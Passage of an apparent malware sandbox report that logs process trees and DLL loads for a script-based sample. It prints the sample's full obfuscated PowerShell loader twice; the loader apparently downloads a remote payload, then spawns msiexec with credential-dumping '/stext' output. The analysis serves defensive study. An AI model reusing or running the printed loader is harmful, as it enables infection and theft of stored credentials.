huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyGJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
